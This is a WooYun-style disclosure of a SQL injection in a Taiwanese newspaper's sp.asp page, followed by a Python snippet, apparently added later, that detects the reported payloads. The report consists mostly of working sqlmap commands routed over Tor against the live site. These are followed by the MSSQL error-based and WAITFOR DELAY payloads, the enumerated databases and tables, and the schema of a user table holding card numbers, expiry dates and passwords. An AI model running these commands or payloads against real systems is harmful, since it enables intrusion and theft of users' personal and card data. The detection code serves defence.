WooYun (WooYun.org) historical vulnerability lookup: http://wy.zone.ci/
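2015-10-30: Details reported to the vendor; awaiting vendor handling
2015-11-02: Vendor has confirmed; details disclosed to the vendor only
2015-11-12: Details disclosed to core white hats and experts in related fields
2015-11-22: Details disclosed to regular white hats
2015-12-02: Details disclosed to trainee white hats
2015-12-17: Details disclosed to the public

SQL injection at a Taiwanese newspaper affects the information of 3,000 users (including bank card information)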

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --technique=BEUT -u "http://**.**.**.**/guidepost/sp.asp" --data="sC=b" --dbs --is-dba --current-db
---
Parameter: sC (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: sC=b' AND 4193=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)+CHAR(118)+CHAR(106)+CHAR(113)+(SELECT (CASE WHEN (4193=4193) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(118)+CHAR(113))) AND 'jhKo'='jhKo

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: sC=b' WAITFOR DELAY '0:0:20'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
current database: 'sp'
current user is DBA: False
available databases [9]:
[*] absolutebm
[*] cpnews
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] sp
[*] tempdb

Database: sp
+-------------------------+---------+
| Table                   | Entries |
+-------------------------+---------+
| dbo.sptests             | 10103   |
| dbo.sp_headlinenews     | 8318    |
| dbo.guidepost           | 4510    |
| dbo.mp3_user            | 3346    |
| dbo.mp3_user1           | 1804    |
| dbo.inews_daily         | 1770    |
| dbo.articles            | 1409    |
| dbo.v_photogallery      | 1192    |
| dbo.sp_contents         | 1106    |
| dbo.sp_convert_20150616 | 847     |
| dbo.inews_contents      | 770     |
| dbo.mp3_contents        | 756     |
| dbo.sp_print1           | 474     |
| dbo.sp_newtimestamp     | 415     |
| dbo.three               | 207     |
| dbo.sp_n_contents       | 201     |
| dbo.inews_newtimestamp  | 155     |
| dbo.sp_timestamp        | 104     |
| dbo.one                 | 103     |
| dbo.sun                 | 75      |
| dbo.i380                | 73      |
| dbo.exam_user           | 57      |
| dbo.cptests             | 31      |
| dbo.sysconstraints      | 17      |
| dbo.sp_online           | 16      |
| dbo.sp_print            | 16      |
| dbo.syssegments         | 3       |
| dbo.mp3_samples         | 1       |
| dbo.onlyLogin           | 1       |
| dbo.textlink            | 1       |
+-------------------------+---------+

Database: sp
Table: mp3_user ====> One of the columns here should store credit card information, because when I tried (only tried; I did not finish the dump and did not save any information) to dump the first record, I found that one column stored "Visa". On seeing this record I cancelled the dump and did not see the actual number.
[25 columns]
+----------------+---------------+
| Column         | Type          |
+----------------+---------------+
| active         | int           |
| address        | varchar       |
| birthday       | smalldatetime |
| e_issue        | int           |
| email          | varchar       |
| gender         | varchar       |
| id             | int           |
| login_id       | varchar       |
| login_password | varchar       |
| name           | varchar       |
| o_date         | smalldatetime |
| o_type         | int           |
| ocardcode      | varchar       |
| ocardexpires   | varchar       |
| ocardno        | varchar       |
| ocardtype      | varchar       |
| price          | int           |
| profession     | varchar       |
| re_date        | smalldatetime |
| reminder       | int           |
| renew          | int           |
| s_issue        | int           |
| sw_date        | smalldatetime |
| telephone      | varchar       |
| tracer_id      | varchar       |
+----------------+---------------+

$ ./sqlmap.py --tor --tor-type=SOCKS5 --random-agent --time-sec=20 --technique=BEUT --union-char=N -u "http://**.**.**.**/guidepost/sp.asp" --data="sC=b" --dump -Dsp -Tmp3_user --stop 1
[11:48:52] [INFO] resumed: Visa

Finally, to state once more: this only proves that the vulnerability exists; no user information was dumped.
Filtering
Severity: High
Vulnerability Rank: 15
Confirmed at: 2015-11-02 00:47
Thank you for the report
None yet
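
Added example, not part of the original report or the vendor's code: a Python check that flags form-encoded POST parameters shaped like the two payload types sqlmap reported for sC above (error-based CONVERT(INT, ... CHAR()+CHAR() ...) and time-based WAITFOR DELAY). The rule names, function name and sample bodies are constructed for illustration; the second sample is abridged from the payload in the report.

```python
import re
from urllib.parse import parse_qsl, urlencode

# Rules modelled on the two payload shapes in the sqlmap output (assumed names).
RULES = {
    # CONVERT(INT, ...) wrapped around concatenated CHAR(n) calls. A raw '+'
    # in a form body decodes to a space, so accept either between the calls.
    "mssql-error-based": re.compile(
        r"CONVERT\s*\(\s*INT\s*,.*?CHAR\s*\(\s*\d+\s*\)[\s+]*CHAR\s*\(",
        re.I | re.S),
    # WAITFOR DELAY 'h:m:s' used to stall the response.
    "mssql-time-based": re.compile(
        r"WAITFOR\s+DELAY\s+'\d{1,2}:\d{1,2}:\d{1,2}'", re.I),
}


def classify_body(body):
    """Return a sorted list of (parameter, rule) hits for a urlencoded body."""
    hits = set()
    # parse_qsl percent-decodes values, so encoded payloads are seen in clear.
    for name, value in parse_qsl(body, keep_blank_values=True):
        for rule, pattern in RULES.items():
            if pattern.search(value):
                hits.add((name, rule))
    return sorted(hits)


# Constructed sample request bodies for the sC parameter.
SAMPLES = [
    urlencode({"sC": "b"}),
    urlencode({"sC": "b' AND 4193=CONVERT(INT,(SELECT CHAR(113)+CHAR(98)))"
                     " AND 'jhKo'='jhKo"}),
    urlencode({"sC": "b' WAITFOR DELAY '0:0:20'--"}),
    "q=convert+the+delay+table",  # benign text that shares keywords
]

if __name__ == "__main__":
    for body in SAMPLES:
        print(classify_body(body) or "clean", "<-", body)
```

A hit is a signal for alerting or blocking at the edge; it does not replace binding sC as a query parameter in sp.asp.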